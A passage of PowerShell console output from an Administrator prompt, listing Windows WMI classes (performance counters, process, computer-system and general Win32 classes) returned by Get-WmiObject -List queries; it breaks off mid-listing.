{} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETDataProvide... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETDataP... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETDataProvide... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETFrame... {} {AssemblySearchLength, BytesinLoaderHeap, Caption, Currentappdomains...} Win32_PerfRawData_NETFramework_N... {} {AssemblySearchLength, BytesinLoaderHeap, Caption, Currentappdomains...} Win32_PerfFormattedData_NETFrame... {} {Caption, ContentionRatePersec, CurrentQueueLength, Description...} Win32_PerfRawData_NETFramework_N... {} {Caption, ContentionRatePersec, CurrentQueueLength, Description...} Win32_PerfFormattedData_NETFrame... {} {AllocatedBytesPersec, Caption, Description, FinalizationSurvivors...} Win32_PerfRawData_NETFramework_N... {} {AllocatedBytesPersec, Caption, Description, FinalizationSurvivors...} Win32_PerfFormattedData_NETFrame... {} {Caption, Channels, ContextBoundClassesLoaded, ContextBoundObjectsAllocPersec...} Win32_PerfRawData_NETFramework_N... {} {Caption, Channels, ContextBoundClassesLoaded, ContextBoundObjectsAllocPersec...} Win32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETMemor... {} {CacheEntries, CacheHitRatio, CacheHits, CacheMisses...} Win32_PerfRawData_NETMemoryCache... {} {CacheEntries, CacheHitRatio, CacheHitRatio_Base, CacheHits...} Win32_PerfFormattedData_NTDS_NTDS {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...} Win32_PerfRawData_NTDS_NTDS {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...} Win32_PerfFormattedData_PerfDisk... {} {AvgDiskBytesPerRead, AvgDiskBytesPerTransfer, AvgDiskBytesPerWrite, AvgDiskQueueLength...} Win32_PerfRawData_PerfDisk_Logic... {} {AvgDiskBytesPerRead, AvgDiskBytesPerRead_Base, AvgDiskBytesPerTransfer, AvgDiskBytesPerTransfer_Base...} Win32_PerfFormattedData_PerfDisk... {} {AvgDiskBytesPerRead, AvgDiskBytesPerTransfer, AvgDiskBytesPerWrite, AvgDiskQueueLength...} Win32_PerfRawData_PerfDisk_Physi... {} {AvgDiskBytesPerRead, AvgDiskBytesPerRead_Base, AvgDiskBytesPerTransfer, AvgDiskBytesPerTransfer_Base...} Win32_PerfFormattedData_PerfNet_... {} {AnnouncementsDomainPersec, AnnouncementsServerPersec, AnnouncementsTotalPersec, Caption...} Win32_PerfRawData_PerfNet_Browser {} {AnnouncementsDomainPersec, AnnouncementsServerPersec, AnnouncementsTotalPersec, Caption...} Win32_PerfFormattedData_PerfNet_... {} {BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec, Caption...} Win32_PerfRawData_PerfNet_Redire... {} {BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec, Caption...} Win32_PerfFormattedData_PerfNet_... {} {BlockingRequestsRejected, BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec...} Win32_PerfRawData_PerfNet_Server {} {BlockingRequestsRejected, BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec...} Win32_PerfFormattedData_PerfNet_... {} {ActiveThreads, AvailableThreads, AvailableWorkItems, BorrowedWorkItems...} Win32_PerfRawData_PerfNet_Server... {} {ActiveThreads, AvailableThreads, AvailableWorkItems, BorrowedWorkItems...} Win32_PerfFormattedData_PerfOS_C... {} {AsyncCopyReadsPersec, AsyncDataMapsPersec, AsyncFastReadsPersec, AsyncMDLReadsPersec...} Win32_PerfRawData_PerfOS_Cache {} {AsyncCopyReadsPersec, AsyncDataMapsPersec, AsyncFastReadsPersec, AsyncMDLReadsPersec...} Win32_PerfFormattedData_PerfOS_M... {} {AvailableBytes, AvailableKBytes, AvailableMBytes, CacheBytes...} Win32_PerfRawData_PerfOS_Memory {} {AvailableBytes, AvailableKBytes, AvailableMBytes, CacheBytes...} Win32_PerfFormattedData_PerfOS_N... {} {AvailableMBytes, Caption, Description, FreeAndZeroPageListMBytes...} Win32_PerfRawData_PerfOS_NUMANod... {} {AvailableMBytes, Caption, Description, FreeAndZeroPageListMBytes...} Win32_PerfFormattedData_PerfOS_O... {} {Caption, Description, Events, Frequency_Object...} Win32_PerfRawData_PerfOS_Objects {} {Caption, Description, Events, Frequency_Object...} Win32_PerfFormattedData_PerfOS_P... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_PerfOS_PagingFile {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_PerfOS_P... {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...} Win32_PerfRawData_PerfOS_Processor {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...} Win32_PerfFormattedData_PerfOS_S... {} {AlignmentFixupsPersec, Caption, ContextSwitchesPersec, Description...} Win32_PerfRawData_PerfOS_System {} {AlignmentFixupsPersec, Caption, ContextSwitchesPersec, Description...} Win32_PerfFormattedData_PerfProc... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...} Win32_PerfRawData_PerfProc_FullI... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...} Win32_PerfFormattedData_PerfProc... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...} Win32_PerfRawData_PerfProc_Image... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...} Win32_PerfFormattedData_PerfProc... {} {Caption, CurrentPercentKernelModeTime, CurrentPercentProcessorTime, CurrentPercentUserModeTime...} Win32_PerfRawData_PerfProc_JobOb... {} {Caption, CurrentPercentKernelModeTime, CurrentPercentProcessorTime, CurrentPercentUserModeTime...} Win32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfRawData_PerfProc_JobOb... {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfRawData_PerfProc_Process {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfFormattedData_PerfProc... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...} Win32_PerfRawData_PerfProc_Proce... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...} Win32_PerfFormattedData_PerfProc... {} {Caption, ContextSwitchesPersec, Description, ElapsedTime...} Win32_PerfRawData_PerfProc_Thread {} {Caption, ContextSwitchesPersec, Description, ElapsedTime...} Win32_PerfFormattedData_PerfProc... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_PerfProc_Threa... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_PowerMet... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_PowerMeterCoun... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_RemoteAc... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...} Win32_PerfRawData_RemoteAccess_R... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...} Win32_PerfFormattedData_RemoteAc... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...} Win32_PerfRawData_RemoteAccess_R... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...} Win32_PerfFormattedData_ServiceM... {} {Calls, CallsDuration, CallsFailed, CallsFailedPerSecond...} Win32_PerfRawData_ServiceModel40... {} {Calls, CallsDuration, CallsDuration_Base, CallsFailed...} Win32_PerfFormattedData_ServiceM... {} {CallFailedPerSecond, Calls, CallsDuration, CallsFailed...} Win32_PerfRawData_ServiceModel40... {} {CallFailedPerSecond, Calls, CallsDuration, CallsDuration_Base...} Win32_PerfFormattedData_ServiceM... {} {Calls, CallsDuration, CallsFailed, CallsFailedPerSecond...} Win32_PerfRawData_ServiceModel40... {} {Calls, CallsDuration, CallsDuration_Base, CallsFailed...} Win32_PerfFormattedData_SMSvcHos... {} {Caption, ConnectionsAcceptedovernetpipe, ConnectionsAcceptedovernettcp, ConnectionsDispatchedovernetpipe...} Win32_PerfRawData_SMSvcHost4000_... {} {Caption, ConnectionsAcceptedovernetpipe, ConnectionsAcceptedovernettcp, ConnectionsDispatchedovernetpipe...} Win32_PerfFormattedData_Spooler_... {} {AddNetworkPrinterCalls, BytesPrintedPersec, Caption, Description...} Win32_PerfRawData_Spooler_PrintQ... {} {AddNetworkPrinterCalls, BytesPrintedPersec, Caption, Description...} Win32_PerfFormattedData_TapiSrv_... {} {ActiveLines, ActiveTelephones, Caption, ClientApps...} Win32_PerfRawData_TapiSrv_Telephony {} {ActiveLines, ActiveTelephones, Caption, ClientApps...} Win32_PerfFormattedData_Tcpip_ICMP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Tcpip_ICMP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Tcpip_IC... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Tcpip_ICMPv6 {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Tcpip_IPv4 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...} Win32_PerfRawData_Tcpip_IPv4 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...} Win32_PerfFormattedData_Tcpip_IPv6 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...} Win32_PerfRawData_Tcpip_IPv6 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...} Win32_PerfFormattedData_Tcpip_NB... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfRawData_Tcpip_NBTConne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfFormattedData_Tcpip_Ne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfRawData_Tcpip_NetworkA... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfFormattedData_Tcpip_Ne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfRawData_Tcpip_NetworkI... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfFormattedData_Tcpip_TCPv4 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...} Win32_PerfRawData_Tcpip_TCPv4 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...} Win32_PerfFormattedData_Tcpip_TCPv6 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...} Win32_PerfRawData_Tcpip_TCPv6 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...} Win32_PerfFormattedData_Tcpip_UDPv4 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...} Win32_PerfRawData_Tcpip_UDPv4 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...} Win32_PerfFormattedData_Tcpip_UDPv6 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...} Win32_PerfRawData_Tcpip_UDPv6 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...} Win32_PerfFormattedData_TCPIPCou... {} {Caption, Deniedconnectorsendrequestsinlowpowermode, Description, Frequency_Object...} Win32_PerfRawData_TCPIPCounters_... {} {Caption, Deniedconnectorsendrequestsinlowpowermode, Description, Frequency_Object...} Win32_PerfFormattedData_TermServ... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_TermService_Te... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_usbhub_USB {} {AvgBytesPerTransfer, AvgmslatencyforISOtransfers, BulkBytesPerSec, Caption...} Win32_PerfRawData_usbhub_USB {} {AvgBytesPerTransfer, AvgBytesPerTransfer_Base, AvgmslatencyforISOtransfers, AvgmslatencyforISOtransfers_Base...} Win32_PerfFormattedData_WindowsW... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WindowsWorkflo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_WinNatCo... {} {Caption, CurrentSessionCount, Description, DroppedICMPerrorpackets...} Win32_PerfRawData_WinNatCounters... {} {Caption, CurrentSessionCount, Description, DroppedICMPerrorpackets...} Win32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Workflow... {} {AverageWorkflowLoadTime, AverageWorkflowPersistTime, Caption, Description...} Win32_PerfRawData_WorkflowServic... {} {AverageWorkflowLoadTime, AverageWorkflowLoadTime_Base, AverageWorkflowPersistTime, AverageWorkflowPersistTime_Base...} PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Namespace "root/cimv2" -List | Where-Object {$_.Name -match "process"} NameSpace: ROOT\cimv2 Name Methods Properties ---- ------- ---------- Win32_ProcessTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...} Win32_ProcessStartTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...} Win32_ProcessStopTrace {} {ExitStatus, ParentProcessID, ProcessID, ProcessName...} Win32_NamedJobObjectProcess {} {Collection, Member} CIM_Processor {SetPowerState, R... {AddressWidth, Availability, Caption, ConfigManagerErrorCode...} Win32_Processor {SetPowerState, R... {AddressWidth, Architecture, Availability, Caption...} CIM_Process {} {Caption, CreationClassName, CreationDate, CSCreationClassName...} Win32_Process {Create, Terminat... {Caption, CommandLine, CreationClassName, CreationDate...} Win32_ProcessStartup {} {CreateFlags, EnvironmentVariables, ErrorMode, FillAttribute...} Win32_ComputerSystemProcessor {} {GroupComponent, PartComponent} Win32_SystemProcesses {} {GroupComponent, PartComponent} CIM_ProcessThread {} {GroupComponent, PartComponent} CIM_OSProcess {} {GroupComponent, PartComponent} CIM_ProcessExecutable {} {Antecedent, BaseAddress, Dependent, GlobalProcessCount...} Win32_SessionProcess {} {Antecedent, Dependent} CIM_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent} Win32_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent} Win32_PerfFormattedData_Counters... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...} Win32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...} Win32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...} Win32_PerfFormattedData_Counters... {} {AverageIdleTime, C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec...} Win32_PerfRawData_Counters_Proce... {} {AverageIdleTime, AverageIdleTime_Base, C1TransitionsPersec, C2TransitionsPersec...} Win32_PerfFormattedData_Lsa_Secu... {} {Caption, ContextHandles, CredentialHandles, Description...} Win32_PerfRawData_Lsa_SecurityPe... {} {Caption, ContextHandles, CredentialHandles, Description...} Win32_PerfFormattedData_PerfOS_P... {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...} Win32_PerfRawData_PerfOS_Processor {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...} Win32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfRawData_PerfProc_Process {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfFormattedData_PerfProc... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...} Win32_PerfRawData_PerfProc_Proce... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...} PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Namespace "root/cimv2" -List | Where-Object {$_.Name -match "computer"} NameSpace: ROOT\cimv2 Name Methods Properties ---- ------- ---------- Win32_ComputerSystemEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_ComputerShutdownEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED, Type} CIM_ComputerSystem {} {Caption, CreationClassName, Description, InstallDate...} CIM_UnitaryComputerSystem {SetPowerState} {Caption, CreationClassName, Description, InitialLoadInfo...} Win32_ComputerSystem {SetPowerState, R... {AdminPasswordStatus, AutomaticManagedPagefile, AutomaticResetBootOption, AutomaticResetCapability...} CIM_ComputerSystemResource {} {GroupComponent, PartComponent} CIM_ComputerSystemMappedIO {} {GroupComponent, PartComponent} CIM_ComputerSystemDMA {} {GroupComponent, PartComponent} CIM_ComputerSystemIRQ {} {GroupComponent, PartComponent} Win32_ComputerSystemProcessor {} {GroupComponent, PartComponent} CIM_ComputerSystemPackage {} {Antecedent, Dependent} Win32_ComputerSystemProduct {} {Caption, Description, IdentifyingNumber, Name...} Win32_NTLogEventComputer {} {Computer, Record} PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Namespace "root/cimv2" -List | Where-Object {$_.Name -match "win32"} NameSpace: ROOT\cimv2 Name Methods Properties ---- ------- ---------- __Win32Provider {} {ClientLoadableCLSID, CLSID, Concurrency, DefaultMachineName...} Win32_ComputerSystemEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_ComputerShutdownEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED, Type} Win32_IP4RouteTableEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED} Win32_SystemTrace {} {SECURITY_DESCRIPTOR, TIME_CREATED} Win32_ProcessTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...} Win32_ProcessStartTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...} Win32_ProcessStopTrace {} {ExitStatus, ParentProcessID, ProcessID, ProcessName...} Win32_ModuleTrace {} {SECURITY_DESCRIPTOR, TIME_CREATED} Win32_ModuleLoadTrace {} {DefaultBase, FileName, ImageBase, ImageChecksum...} Win32_ThreadTrace {} {ProcessID, SECURITY_DESCRIPTOR, ThreadID, TIME_CREATED} Win32_ThreadStartTrace {} {ProcessID, SECURITY_DESCRIPTOR, StackBase, StackLimit...} Win32_ThreadStopTrace {} {ProcessID, SECURITY_DESCRIPTOR, ThreadID, TIME_CREATED} Win32_PowerManagementEvent {} {EventType, OEMEventCode, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_DeviceChangeEvent {} {EventType, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_SystemConfigurationChangeE... {} {EventType, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_VolumeChangeEvent {} {DriveName, EventType, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_PrivilegesStatus {} {Description, Operation, ParameterInfo, PrivilegesNotHeld...} Win32_JobObjectStatus {} {AdditionalDescription, Description, Operation, ParameterInfo...} Win32_Trustee {} {Domain, Name, SID, SidLength...} Win32_ACE {} {AccessMask, AceFlags, AceType, GuidInheritedObjectType...} Win32_SecurityDescriptor {} {ControlFlags, DACL, Group, Owner...} Win32_CollectionStatistics {} {Collection, Stats} Win32_NamedJobObjectStatistics {} {Collection, Stats} Win32_NTLogEvent {} {Category, CategoryString, ComputerName, Data...} Win32_ActiveRoute {} {SameElement, SystemElement} Win32_AccountSID {} {Element, Setting} Win32_SecurityDescriptorHelper {Win32SDToSDDL, W... {} Win32_TimeZone {} {Bias, Caption, DaylightBias, DaylightDay...} Win32_PageFileSetting {} {Caption, Description, InitialSize, MaximumSize...} Win32_Desktop {} {BorderWidth, Caption, CoolSwitch, CursorBlinkRate...} Win32_ShadowContext {} {Caption, ClientAccessible, Description, Differential...} Win32_MSIResource {} {Caption, Description, SettingID} Win32_ServiceControl {} {Arguments, Caption, Description, Event...} Win32_Property {} {Caption, Description, ProductCode, Property...} Win32_Patch {} {Attributes, Caption, Description, File...} Win32_PatchPackage {} {Caption, Description, PatchID, ProductCode...} Win32_Binary {} {Caption, Data, Description, Name...} Win32_AutochkSetting {} {Caption, Description, SettingID, UserInputDelay} Win32_SerialPortConfiguration {} {AbortReadWriteOnError, BaudRate, BinaryModeEnabled, BitsPerByte...} Win32_StartupCommand {} {Caption, Command, Description, Location...} Win32_BootConfiguration {} {BootDirectory, Caption, ConfigurationPath, Description...} Win32_NetworkLoginProfile {} {AccountExpires, AuthorizationFlags, BadPasswordCount, Caption...} Win32_NamedJobObjectLimitSetting {} {ActiveProcessLimit, Affinity, Caption, Description...} Win32_NamedJobObjectSecLimitSetting {} {Caption, Description, PrivilegesToDelete, RestrictedSIDs...} Win32_DisplayConfiguration {} {BitsPerPel, Caption, Description, DeviceName...} Win32_NetworkAdapterConfiguration {EnableDHCP, Rene... {ArpAlwaysSourceRoute, ArpUseEtherSNAP, Caption, DatabasePath...} Win32_QuotaSetting {} {Caption, DefaultLimit, DefaultWarningLimit, Description...} Win32_SecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, SettingID} Win32_LogicalFileSecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, OwnerPermissions...} Win32_LogicalShareSecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, Name...} Win32_DisplayControllerConfigura... {} {BitsPerPixel, Caption, ColorPlanes, Description...} Win32_WMISetting {} {ASPScriptDefaultNamespace, ASPScriptEnabled, AutorecoverMofs, AutoStartWin9X...} Win32_OSRecoveryConfiguration {} {AutoReboot, Caption, DebugFilePath, DebugInfoType...} Win32_COMSetting {} {Caption, Description, SettingID} Win32_ClassicCOMClassSetting {} {AppID, AutoConvertToClsid, AutoTreatAsClsid, Caption...} Win32_DCOMApplicationSetting {GetLaunchSecurit... {AppID, AuthenticationLevel, Caption, CustomSurrogate...} Win32_VideoConfiguration {} {ActualColorResolution, AdapterChipType, AdapterCompatibility, AdapterDACType...} Win32_ODBCAttribute {} {Attribute, Caption, Description, Driver...} Win32_ODBCSourceAttribute {} {Attribute, Caption, DataSource, Description...} Win32_PrinterConfiguration {} {BitsPerPel, Caption, Collate, Color...} Win32_CurrentTime {} {Day, DayOfWeek, Hour, Milliseconds...} Win32_UTCTime {} {Day, DayOfWeek, Hour, Milliseconds...} Win32_LocalTime {} {Day, DayOfWeek, Hour, Milliseconds...} Win32_ShortcutAction {Invoke} {ActionID, Arguments, Caption, Description...} Win32_ExtensionInfoAction {Invoke} {ActionID, Argument, Caption, Command...} Win32_CreateFolderAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_RegistryAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_ClassInfoAction {Invoke} {ActionID, AppID, Argument, Caption...} Win32_SelfRegModuleAction {Invoke} {ActionID, Caption, Cost, Description...} Win32_TypeLibraryAction {Invoke} {ActionID, Caption, Cost, Description...} Win32_BindImageAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_RemoveIniAction {Invoke} {Action, ActionID, Caption, Description...} Win32_MIMEInfoAction {Invoke} {ActionID, Caption, CLSID, ContentType...} Win32_FontInfoAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_PublishComponentAction {Invoke} {ActionID, AppData, Caption, ComponentID...} Win32_MoveFileAction {Invoke} {ActionID, Caption, Description, DestFolder...} Win32_DuplicateFileAction {Invoke} {ActionID, Caption, DeleteAfterCopy, Description...} Win32_RemoveFileAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_ProductResource {} {Product, Resource} Win32_FolderRedirectionHealth {} {HealthStatus, LastSuccessfulSyncTime, LastSyncStatus, LastSyncTime...} Win32_MountPoint {} {Directory, Volume} Win32_UserProfile {ChangeOwner} {AppDataRoaming, Contacts, Desktop, Documents...} Win32_RoamingProfileMachineConfi... {} {AddAdminGroupToRUPEnabled, AllowCrossForestUserPolicy, BackgroundUploadParams, DeleteProfilesOlderDays...} Win32_ManagedSystemElementResource {} {} Win32_SoftwareElementResource {} {Element, Setting} Win32_SID {} {AccountName, BinaryRepresentation, ReferencedDomainName, SID...} Win32_ActionCheck {} {Action, Check} Win32_UserDesktop {} {Element, Setting} Win32_DeviceSettings {} {Element, Setting} Win32_PrinterSetting {} {Element, Setting} Win32_NetworkAdapterSetting {} {Element, Setting} Win32_SerialPortSetting {} {Element, Setting} Win32_SystemSetting {} {Element, Setting} Win32_SystemProgramGroups {} {Element, Setting} Win32_SystemBootConfiguration {} {Element, Setting} Win32_SystemTimeZone {} {Element, Setting} Win32_SystemDesktop {} {Element, Setting} Win32_ClassicCOMClassSettings {} {Element, Setting} Win32_VolumeQuota {} {Element, Setting} Win32_WMIElementSetting {} {Element, Setting} Win32_COMApplicationSettings {} {Element, Setting} Win32_VideoSettings {} {Element, Setting} Win32_SecuritySettingOfObject {} {Element, Setting} Win32_SecuritySettingOfLogicalShare {} {Element, Setting} Win32_SecuritySettingOfLogicalFile {} {Element, Setting} Win32_PageFileElementSetting {} {Element, Setting} Win32_OperatingSystemAutochkSetting {} {Element, Setting} Win32_VolumeQuotaSetting {} {Element, Setting} Win32_ProductSoftwareFeatures {} {Component, Product} Win32_ImplementedCategory {} {Category, Component} Win32_RoamingProfileUserConfigur... {} {DirectoriesToSyncAtLogonLogoff, ExcludedProfileDirs, IsConfiguredByWMI} Win32_InstalledSoftwareElement {} {Software, System} Win32_SoftwareFeatureCheck {} {Check, Element} Win32_LUIDandAttributes {} {Attributes, LUID} Win32_VolumeUserQuota {} {Account, DiskSpaceUsed, Limit, Status...} Win32_LUID {} {HighPart, LowPart} Win32_DirectorySpecification {Invoke} {Caption, CheckID, CheckMode, DefaultDir...} Win32_SoftwareElementCondition {Invoke} {Caption, CheckID, CheckMode, Condition...} Win32_ODBCDriverSpecification {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_ServiceSpecification {Invoke} {Caption, CheckID, CheckMode, Dependencies...} Win32_FileSpecification {Invoke} {Attributes, Caption, CheckID, CheckMode...} Win32_IniFileSpecification {Invoke} {Action, Caption, CheckID, CheckMode...} Win32_LaunchCondition {Invoke} {Caption, CheckID, CheckMode, Condition...} Win32_ODBCDataSourceSpecification {Invoke} {Caption, CheckID, CheckMode, DataSource...} Win32_ODBCTranslatorSpecification {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_ProgIDSpecification {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_EnvironmentSpecification {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_ReserveCost {Invoke} {Caption, CheckID, CheckMode, Description...} Win32_Condition {Invoke} {Caption, CheckID, CheckMode, Condition...} Win32_ShadowStorage {Create} {AllocatedSpace, DiffVolume, MaxSpace, UsedSpace...} Win32_DCOMApplicationAccessAllow... {} {Element, Setting} Win32_FolderRedirection {} {ContentsMoved, ContentsMovedOnPolicyRemoval, ContentsRenamedInLocalCache, ExclusiveRightsGranted...} Win32_NamedJobObjectProcess {} {Collection, Member} Win32_TokenPrivileges {} {PrivilegeCount, Privileges} Win32_NamedJobObject {} {BasicUIRestrictions, Caption, CollectionID, Description} Win32_PnPDevice {} {SameElement, SystemElement} Win32_ServiceSpecificationService {} {Check, Element} Win32_ShareToDirectory {} {Share, SharedElement} Win32_SettingCheck {} {Check, Setting} Win32_PatchFile {} {Check, Setting} Win32_ODBCDriverAttribute {} {Check, Setting} Win32_ODBCDataSourceAttribute {} {Check, Setting} Win32_ClientApplicationSetting {} {Application, Client} Win32_RoamingUserHealthConfigura... {} {HealthStatusForTempProfiles, LastProfileDownloadIntervalCautionInHours, LastProfileDownloadIntervalUnhealthyInHours, LastProfileUploadInterva... Win32_UserStateConfigurationCont... {} {FolderRedirection, OfflineFiles, RoamingUserProfile} Win32_ServerFeature {} {ID, Name, ParentID} Win32_SecuritySettingOwner {} {Owner, SecuritySetting} Win32_LogicalFileOwner {} {Owner, SecuritySetting} Win32_PhysicalMedia {} {Capacity, Caption, CleanerMedia, CreationClassName...} Win32_PhysicalMemory {} {BankLabel, Capacity, Caption, CreationClassName...} Win32_OnBoardDevice {} 